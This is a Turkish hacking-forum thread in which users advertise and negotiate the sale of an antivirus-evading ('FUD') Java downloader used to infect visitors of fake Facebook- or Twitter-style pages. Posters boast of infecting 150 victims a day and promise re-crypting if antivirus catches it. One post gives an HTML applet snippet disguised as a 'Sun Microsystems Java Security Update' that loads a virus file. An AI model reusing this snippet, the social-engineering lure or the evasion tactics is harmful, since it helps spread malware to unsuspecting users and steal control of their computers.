folder Tahribat.com Forumları
linefolder Bilgisayar Güvenliği - Backdoorlar
linefolder Tek Sorgulu Fud Java Downloader Satılacaktır

Tek Sorgulu Fud Java Downloader Satılacaktır

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek
    s.a hocalar java downloader nedir diyenler için. mesela bi chat sitesine girdiğinizde chatin başlayabilmesi için(javayla yazılmşsa) runa tıklamanız gerekir. işte java downloaderda bunu yapıyor. siteye giren kurban sorguyu görüyor sitenin tasarımıda facebook veya twittera benzediği için runa tıklıyor. böylece kurbana virüs bulaşmış oluyor. normal çalıştır kaydet iptal gibi saçma bişey değil yani bu yolla günde 150 kurban kasanlar oldu biliyorum :) almak isteyen buradan yazarsa yi olur başkalarıda görür :)
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Erkek

hocam kendin mi yazdın yoksa sağdan soldan yabancı sitelerden bulupdamı satıyorsun ?

3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek
    evet downloader kendi fudlamamdır. sağda solda ben paylaşmadıkça bulamazsın :D edit:
    http://www.hidden-sabotage.com/html-downloaderlar-public-uyeler-tarafindan-paylasilan-bolum/4606-pcdoktor636-java-downloader-fud.html
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ★★★★
    Genki
    Genki's avatar
    Erkek

şimdi hocam  2 gün sonra elimde patlarsa bunu tekrar fudlayabilecekmisin. Yada öyle bir garanti veriyormusun. Bende tutup virustotalda taratacak değilim tabi ama aldım diyelim olduda 1 hafta sonra antiler tanıdı bunun için birşeyler garanti edebiliyormusun

O yüzden sormuştum kendin mi yazdın diye

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek
    Genki bunu yazdı:
    -----------------------------

şimdi hocam  2 gün sonra elimde patlarsa bunu tekrar fudlayabilecekmisin. Yada öyle bir garanti veriyormusun. Bende tutup virustotalda taratacak değilim tabi ama aldım diyelim olduda 1 hafta sonra antiler tanıdı bunun için birşeyler garanti edebiliyormusun

O yüzden sormuştum kendin mi yazdın diye

1 hafta sonra yenisini veririm. veremezsem paranın üyük bir kısmını iade ederim. ancak %10 gibi bi kısmıda bende kalır çünkü belki kullanıcı hatasıdır kullanıcı jarın tanınmasına sebep olmuştur o yüzden %10luk bir kısım fazla etkilemez heralde. 50 ytlye satsam 5 ytlnin bende kalması fazla etkilemez heralde seni :D ama uzun süre fud kalır bunun garantisini verebiliyorum başka yerde arasanda bulamayacağın downloaderlar
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Erkek

bunlar para ile mi satılıyo la gerçekten :D unkn0wn.ws kapanmadan önce arşiv yapmıştım birsürü java downloader yayınlıyolardı, hemide beleşti ama kapanınca demek beleşler para ediyo

ayrıca arkadaşın dedigi dogru bir gecede 150 pcye bulaştırabilirsiniz hatta daha fazla

"
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek
    syntr bunu yazdı:

bunlar para ile mi satılıyo la gerçekten :D unkn0wn.ws kapanmadan önce arşiv yapmıştım birsürü java downloader yayınlıyolardı, hemide beleşti ama kapanınca demek beleşler para ediyo

ayrıca arkadaşın dedigi dogru bir gecede 150 pcye bulaştırabilirsiniz hatta daha fazla

ama bunlar öyle public değil priv downloaderlar. bulamazsın heryerde. belli bi namının olması lazım vermeleri için :D
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    iLhann
    iLhann's avatar
    Erkek

<applet code="Sun_Microsystems_Java_Security_Update_6.class" archive="dosya_yolu/Sun_Microsystems_Java_Security_Update_6.jar" height="1" width="1">

<param name="file" value="virüs dosya yolu.ee">

</applet>

bu kadar bişey değilmiydi yahu ?

9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Erkek
    iLhann bunu yazdı:

< code="Sun_Microsystems_Java_Security_Update_6.class" archive="dosya_yolu/Sun_Microsystems_Java_Security_Update_6.jar" height="1" width="1">

< name="" value="virüs dosya yolu.ee">

bu kadar bişey değilmiydi yahu ?

ehehe :D bu htmlye koyacağın kod. bunun .jar dosyasını satıyorum buradaki sun microsystems security update.class ve java update.jar yazan dosyalarını :) o downloaderıda az kullanmadım ha abdliler yapmıştı :D
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Fire_109
    Fire_109's avatar
    Erkek

arkadaş bir yamuk yaparsa ben fudlarım rahat olun ;)

Java Downloader Satılır (Kişiye Özel kendim fudlarım) <br> Ref <br> http://hidden-sabotage.com/ <br>
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    AydanBatanGunes
    AydanBatanGunes's avatar
    Erkek

isteyene her turlu java yazarim

Çirkin kızlara uçak çarpsın..
Toplam Hit: 5619 Toplam Mesaj: 23